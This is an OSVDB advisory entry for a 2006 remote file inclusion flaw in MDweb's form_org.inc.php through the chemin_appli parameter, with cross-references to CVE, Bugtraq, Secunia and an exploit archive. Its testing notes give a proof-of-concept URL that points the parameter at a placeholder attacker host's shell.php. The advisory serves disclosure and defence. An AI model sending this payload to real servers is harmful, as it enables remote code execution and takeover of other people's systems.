MDweb form_org.inc.php chemin_appli Variable Remote File Inclusion

2006-10-23T09:03:49
ID OSVDB:30061
Type osvdb
Reporter OSVDB
Modified 2006-10-23T09:03:49

Description

Manual Testing Notes

http://[target]/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://[attacker]/shell.php?

References:

Vendor URL: http://jc.desconnets.free.fr/mdweb/ Secunia Advisory ID:22561 Related OSVDB ID: 30062 ISS X-Force ID: 29721 Generic Exploit URL: http://www.milw0rm.com/exploits/2626 FrSIRT Advisory: ADV-2006-4214 CVE-2006-5587 Bugtraq ID: 20687